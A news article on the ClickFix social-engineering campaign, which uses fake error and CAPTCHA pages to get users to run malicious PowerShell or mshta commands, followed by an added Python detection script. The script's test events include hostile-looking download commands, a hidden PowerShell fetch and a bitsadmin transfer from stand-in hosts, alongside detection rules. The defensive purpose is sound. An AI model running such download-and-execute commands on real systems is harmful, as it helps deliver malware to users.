
ClickFix Uses Fake Errors and Malicious Code against Users


The emergence of a new social engineering tactic known as ClickFix has raised concern among cybersecurity experts. The Sekoia Threat Detection & Research (TDR) team described the tactic, originally identified by Proofpoint in March, in a detailed report released today. ClickFix, also referred to as ClearFake, uses fake error messages on various platforms, including Google Meet and Zoom, to trick users into running harmful PowerShell commands that ultimately infect their devices.

The ClickFix tactic varies its approach depending on the operating system being targeted. macOS users are prompted to click a “fix it” button, which triggers an automatic download and installation of malware packaged as a .dmg file. Windows users may instead encounter either a malicious mshta or PowerShell command, with the latter commonly disguised as a troubleshooting procedure and originating from the legitimate Explorer.exe process to avoid detection.

In addition to popular video conferencing platforms, ClickFix has also been observed using fake CAPTCHA pages to entice users into performing steps that execute malicious code, infecting both Windows and macOS systems. Using GitHub and suspicious websites, the cybercriminals redirect unsuspecting users to these deceptive pages, where a simple PowerShell script does the work: it is hard to detect yet highly impactful.

To combat ClickFix and similar social engineering techniques, the TDR team recommends monitoring for suspicious activities, such as PowerShell and bitsadmin processes with mshta.exe as the parent process, command lines containing URLs indicative of malicious downloads, and network activities involving PowerShell connections to low-prevalence or suspicious domains. By implementing these detection techniques in conjunction with threat intelligence, organizations can bolster their defense mechanisms against the evolving threat posed by ClickFix.
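The three detection ideas above, written out as an added Python triage that is not from the Sekoia report: it runs over constructed Sysmon-style process-creation and network-connection events and flags a PowerShell or bitsadmin child of mshta.exe, a URL in a downloader's command line, and a PowerShell connection to a low-prevalence domain (the field names, sample command lines, domains and the prevalence table are assumptions built for the example).

```python
import re
# Constructed Sysmon-style events (ID 1 process creation, ID 3 network connection); not report data.
PROCESS_EVENTS = [
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\mshta.exe",
     "CommandLine": 'powershell.exe -w hidden -c "iwr http://lure.example.invalid/a.txt"'},
    {"Image": r"C:\Windows\System32\bitsadmin.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"bitsadmin /transfer j https://cdn.example.invalid/u.bin C:\Users\Public\u.bin"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Program Files\Git\usr\bin\bash.exe",
     "CommandLine": "powershell.exe -NoProfile -File build.ps1"},  # benign: no URL, ordinary parent
]
NETWORK_EVENTS = [
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "DestinationHostname": "lure.example.invalid"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "DestinationHostname": "www.powershellgallery.com"},
]
# Assumed prevalence table: number of fleet hosts seen contacting each domain in the last 30 days.
DOMAIN_PREVALENCE = {"www.powershellgallery.com": 412, "lure.example.invalid": 1}
LOW_PREVALENCE = 3  # assumed threshold: this many hosts or fewer counts as low prevalence
URL_RE = re.compile(r"""https?://[^\s"']+""", re.IGNORECASE)
DOWNLOADERS = {"powershell.exe", "pwsh.exe", "bitsadmin.exe"}

def basename(path):
    # Last path component, lower-cased, so images compare by executable name.
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()
def check_process(ev):
    # Rules 1 and 2: downloader spawned by mshta.exe, and a URL in the command line.
    child, parent = basename(ev["Image"]), basename(ev["ParentImage"])
    reasons = []
    if child not in DOWNLOADERS:
        return reasons
    if parent == "mshta.exe":
        reasons.append("downloader spawned by mshta.exe")
    if URL_RE.search(ev["CommandLine"]):
        reasons.append("url in command line")
    return reasons
def check_network(ev):
    # Rule 3: PowerShell connecting to a domain that few hosts in the fleet have contacted.
    host = ev["DestinationHostname"].lower()
    if basename(ev["Image"]) in {"powershell.exe", "pwsh.exe"} and DOMAIN_PREVALENCE.get(host, 0) <= LOW_PREVALENCE:
        return [f"powershell connection to low-prevalence domain {host}"]
    return []
def triage(process_events, network_events):
    # One (kind, index, reasons) tuple per event that trips at least one rule.
    hits = [("process", i, r) for i, e in enumerate(process_events) if (r := check_process(e))]
    hits += [("network", i, r) for i, e in enumerate(network_events) if (r := check_network(e))]
    return hits
```

In production the prevalence table would come from the organisation's own proxy or EDR data, and the rules would be tuned against the benign PowerShell activity it already sees.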

Sekoia emphasized the importance of continuously tracking the delivery infrastructure of ClickFix and enhancing detection capabilities to mitigate the associated risks effectively. As cybercriminals continue to refine their tactics, staying vigilant and adopting proactive cybersecurity measures will be crucial in safeguarding against social engineering attacks like ClickFix.
